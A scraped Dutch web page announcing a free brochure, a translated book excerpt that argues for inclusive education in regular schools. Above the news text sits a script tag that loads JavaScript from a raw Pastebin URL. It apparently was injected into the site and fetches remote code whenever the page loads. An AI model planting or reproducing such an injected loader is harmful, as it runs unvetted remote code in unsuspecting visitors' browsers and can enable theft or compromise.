<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


brochure 5 is uit 13 december 2011
In deze brochure staat het vertaalde eerste deel van het boek "Van Speciaal naar Regulier, van Gewoon naar Buitengewoon."In dit eerste deel staan vele voordelen van Inclusief Onderwijs voor reguliere en speciale kinderen beschreven. In een tijd dat zelfs alle jongens nu officieel worden gelabeld met leerproblemen , kan je niets anders dan elk kind speciaal labelen en dus niemand uitsluiten van het regulier onderwijs. Speciaal onderwijs voor elk kind maar dan op de reguliere school.Gratis aan te vragen via grooff1@hotmail.com

<< Terug